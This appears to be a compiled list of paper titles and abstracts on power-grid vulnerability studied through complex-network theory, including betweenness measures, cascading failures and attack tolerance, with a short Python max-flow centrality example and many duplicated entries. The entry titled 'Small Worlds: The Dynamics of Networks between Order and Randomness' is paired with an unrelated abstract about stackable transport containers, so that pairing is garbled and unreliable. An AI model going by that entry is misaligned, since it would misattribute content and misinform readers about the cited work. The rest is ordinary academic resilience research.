VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. 
This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in the IEEE 300-bus network according to the un-served energy after the network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: LOCATING CRITICAL LINES IN HIGH-VOLTAGE ELECTRICAL POWER GRIDS paper_content: Electrical power grids are among the infrastructures that are attracting a great deal of attention because of their intrinsic criticality. Here we analyze the topological vulnerability and improvability of the Spanish 400 kV, the French 400 kV and the Italian 380 kV power transmission grids. For each network we detect the most critical lines and suggest how to improve the connectivity. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network, and the latest developments incorporate more and more electrical properties as opposed to the purely topological analysis of the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path, so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry a larger portion of the power from the source (generator) to the sink (load) are given a higher weight in this analysis. A few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that, should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases.
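The maximum flow based centrality approach summarized above lends itself to a short computational sketch. The following is only a minimal illustration, not the authors' implementation: it assumes the networkx library, a toy undirected graph whose edges carry a hypothetical `capacity` attribute, and illustrative generator/load node lists; it pushes maximum flow between every generator-load pair and ranks edges by the total flow they carry.

```python
import networkx as nx

def max_flow_edge_centrality(grid, generators, loads, capacity_attr="capacity"):
    """Rank edges of an undirected grid graph by the total flow they carry
    when maximum flow is pushed between every generator-load pair."""
    # Expand the undirected graph into a directed one so that the
    # networkx max-flow routines can be applied in both directions.
    directed = nx.DiGraph()
    for u, v, data in grid.edges(data=True):
        cap = data.get(capacity_attr, 1.0)
        directed.add_edge(u, v, capacity=cap)
        directed.add_edge(v, u, capacity=cap)

    totals = {frozenset(e): 0.0 for e in grid.edges()}
    for src in generators:
        for dst in loads:
            if src == dst:
                continue
            _, flow_dict = nx.maximum_flow(directed, src, dst)
            for u, out_flows in flow_dict.items():
                for v, f in out_flows.items():
                    if f > 0:
                        totals[frozenset((u, v))] += f
    # Highest totals first: these edges carry the largest share of flow
    # between sources and sinks, so they are flagged as the most critical.
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)

if __name__ == "__main__":
    # Toy 5-bus example with made-up line capacities (illustrative only).
    g = nx.Graph()
    g.add_edge(1, 2, capacity=3.0)
    g.add_edge(2, 3, capacity=2.0)
    g.add_edge(1, 4, capacity=1.0)
    g.add_edge(4, 3, capacity=1.0)
    g.add_edge(3, 5, capacity=4.0)
    for edge, score in max_flow_edge_centrality(g, generators=[1], loads=[5]):
        print(sorted(edge), score)
```

On a real test system such as the IEEE 39 bus case, the edge capacities would come from line ratings or power flow data rather than the made-up values used here.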
--- paper_title: Vulnerability Assessment of Power Grid Using Graph Topological Indices paper_content: This paper presents an assessment of the vulnerability of the power grid to blackout using graph topological indexes. Based on a FERC 715 report and the outage reports, the cascading faults of summer WSCC 1996 are reconstructed, and the graphical property of the grid is compared between two cases: when the blackout triggering lines are removed simulating the actual sequence of cascading outages and when the same number of randomly selected lines are removed. The investigation finds that the critical path lengths of the triggering events of the July and August outages of 1996 WSCC blackout are higher than those of no-outage and arbitrary events. In addition, the small world-ness index for each of the outage triggering events is much smaller than that of normal or any no-outage scenario, indicating that events of shifting a network from small world to a random network would be more likely cascaded to wide area outage. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. 
The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provides new insight into the research of interconnected complex power grids. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient, etc., are introduced to describe the network structure characteristics. The statistical results of these parameters for the power grids of China and America are shown and analyzed. Then, the small-world model is explained and applied to the power grid. In order to measure the performance of the power grid globally and locally, the concept of efficiency and its application are also introduced. The mechanism and the model of cascading failure in power grids are then discussed. Finally, some possible directions of future research are proposed at the end of the paper. --- paper_title: Cascade-based attack vulnerability on the US power grid paper_content: The vulnerability of real-life networks subject to intentional attacks has been one of the outstanding challenges in the study of network safety. Applying the real data of the US power grid, we compare the effects of two different attacks on the network robustness against cascading failures, i.e., removal by either the descending or ascending order of the loads. Adopting the initial load of a node $j$ to be $L_j = \left[k_j \left(\sum_{m \in C_j} k_m\right)\right]^{\alpha}$
with $k_j$ and $C_j$ being the degree of the node $j$ and the set of its neighboring nodes, respectively, where $\alpha$ is a tunable parameter that governs the strength of the initial load of a node, we investigate the response of the US power grid under the two attacks during the cascading propagation. In the case of $\alpha < 0.7$, our investigation by numerical simulations leads to a counterintuitive finding on the US power grid that the attack on the nodes with the lowest loads is more harmful than the attack on the ones with the highest loads. In addition, the almost identical effect of the two attacks in the case of $\alpha = 0.7$ may be useful in furthering studies on the control and defense of cascading failures in the US power grid. --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: A vulnerability assessment algorithm for the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is, at present, a graph with no direction and no weights. Because this model is far from the real power system, it can sometimes yield wrong results. In this paper, the components of the power grid are modeled in detail and a weighted, directed graph is provided. First, the connections among buses (rather than only substations, as in the traditional methods), lines, transformers and generators are modeled in detail. Second, the power flow direction in the power grid is considered, as is the components' tolerance to disturbances. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed, and the key components and weak areas are indicated. Finally, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. The North China power grid is used as an example to validate the proposed method. --- paper_title: Suppressing cascades of load in interdependent networks paper_content: Understanding how interdependence among systems affects cascading behaviors is increasingly important across many fields of science and engineering. Inspired by cascades of load shedding in coupled electric grids and other infrastructure, we study the Bak–Tang–Wiesenfeld sandpile model on modular random graphs and on graphs based on actual, interdependent power grids. Starting from two isolated networks, adding some connectivity between them is beneficial, for it suppresses the largest cascades in each system. Too much interconnectivity, however, becomes detrimental for two reasons. First, interconnections open pathways for neighboring networks to inflict large cascades.
Second, as in real infrastructure, new interconnections increase capacity and total possible load, which fuels even larger cascades. Using a multitype branching process and simulations we show these effects and estimate the optimal level of interconnectivity that balances their trade-offs. Such equilibria could allow, for example, power grid owners to minimize the largest cascades in their grid. We also show that asymmetric capacity among interdependent networks affects the optimal connectivity that each prefers and may lead to an arms race for greater capacity. Our multitype branching process framework provides building blocks for better prediction of cascading processes on modular random graphs and on multitype networks in general. --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. paper_content: Transport brackets are affixed to the container and include provisions for achieving transportability with either a crane or a fork lift. Variable storage capacity is provided by an extension bin which is detachably affixed as part of the container. The top and bottom of the container are compatibly configured to provide an interlock between a plurality of stacked containers and a dolly is configured for use with these interlocking provisions. The container is configured to achieve stacking interchangeability when any vertically peripheral sides are aligned and brackets are disposed around the vertical periphery of the container to achieve fork lift accessibility from any direction perpendicular to the vertically peripheral sides. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. 
Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Assessing European power grid reliability by means of topological measures paper_content: Publicat originalment a: WIT transactions on ecology and the environment, 2009, vol. 121, p. 527-537 --- paper_title: The Node Degree Distribution in Power Grid and Its Topology Robustness under Random and Selective Node Removals paper_content: In this paper we numerically study the topology robustness of power grids under random and selective node breakdowns, and analytically estimate the critical node-removal thresholds to disintegrate a system, based on the available US power grid data. We also present an analysis on the node degree distribution in power grids because it closely relates with the topology robustness. It is found that the node degree in a power grid can be well fitted by a mixture distribution coming from the sum of a truncated Geometric random variable and an irregular Discrete random variable. With the findings we obtain better estimates of the threshold under selective node breakdowns which predict the numerical thresholds more correctly. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. 
Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: Identifying vulnerable lines in a power network using complex network theory paper_content: The latest developments in complex network theory have provided a new direction to power system research. Based on this theory a power system can be modelled as a graph with nodes and edges and further analysis can help in identifying the important lines. This paper proposes a new betweenness index using the reactance of the transmission lines as the weight and as a criterion to measure the vulnerability of a power network. The reactance is a simplified measure of power flow in a lossless transmission line based on the power flow analysis equations. The weighted line index is defined as the reactance of the electric path taken to reach from one node to another node. More power is transmitted along lines with lower reactance on the way from the source node to the destination node, which gives the edges with lower reactance a higher weight in the analysis. The analyses have been carried out on the IEEE 39 bus system and the IEEE 118 bus system. The new betweenness index can identify the critical lines of the system, either due to their position in the network or due to the power they transmit along the network. --- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several EU countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful for vulnerability assessment and for designing specific actions to reduce topological weaknesses. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators, Josephson junction arrays, excitable media, neural networks, spatial games, genetic control networks and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder.
We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon (popularly known as six degrees of separation). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: Topological analysis of the power grid and mitigation strategies against cascading failures paper_content: This paper presents a complex systems overview of a power grid network. In recent years, concerns about the robustness of the power grid have grown because of several cascading outages in different parts of the world. In this paper, the cascading effect has been simulated on three different networks, the IEEE 300 bus test system, the IEEE 118 bus test system, and the WSCC 179 bus equivalent model. Power Degradation has been discussed as a measure to estimate the damage to the network, in terms of load loss and node loss. A network generator has been developed to generate graphs with characteristics similar to the IEEE standard networks and the generated graphs are then compared with the standard networks to show the effect of topology in determining the robustness of a power grid. Three mitigation strategies, Homogeneous Load Reduction, Targeted Range-Based Load Reduction, and Use of Distributed Renewable Sources in combination with Islanding, have been suggested. The Homogeneous Load Reduction is the simplest to implement but the Targeted Range-Based Load Reduction is the most effective strategy. --- paper_title: Topological analysis of eastern region of Indian power grid paper_content: The modern power grid is tending towards more complexity as power has become an integral part of life even in remote locations. Thus the vulnerability of such grids has become more prominent, necessitating some simulation based modeling to extract some important features for such a sprawling network. The spatial structure of the power grid has been used for topological analysis of the power grid. The case studies pertaining to the eastern region power grid of India validate such an approach. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines.
These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. 
This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. 
The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Analysis of weighted networks paper_content: The connections in many networks are not merely binary entities, either present or not, but have associated weights that record their strengths relative to one another. Recent studies of networks have, by and large, steered clear of such weighted networks, which are often perceived as being harder to analyze than their unweighted counterparts. Here we point out that weighted networks can in many cases be analyzed using a simple mapping from a weighted network to an unweighted multigraph, allowing us to apply standard techniques for unweighted graphs to weighted ones as well. We give a number of examples of the method, including an algorithm for detecting community structure in weighted networks and a simple proof of the maximum-flow--minimum-cut theorem. --- paper_title: Model for cascading failures in complex networks. paper_content: Large but rare cascades triggered by small initial shocks are present in most of the infrastructure networks. Here we present a simple model for cascading failures based on the dynamical redistribution of the flow on the network. We show that the breakdown of a single node is sufficient to collapse the efficiency of the entire system if the node is among the ones with largest load. This is particularly important for real-world networks with a highly hetereogeneous distribution of loads as the Internet and electrical power grids. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. 
Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Impact of Smart Grid on distribution system design paper_content: There has been much recent discussion on what distribution systems can and should look like in the future. Terms related to this discussion include smart grid, distribution system of the future, and others. Functionally, a smart grid should be able to provide new abilities such as self-healing, high reliability, energy management, and real-time pricing. From a design perspective, a smart grid will likely incorporate new technologies such as advanced metering, automation, communication, distributed generation, and distributed storage. This paper discussed the potential impact that issues related to smart grid will have on distribution system design. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. 
Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. 
Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. 
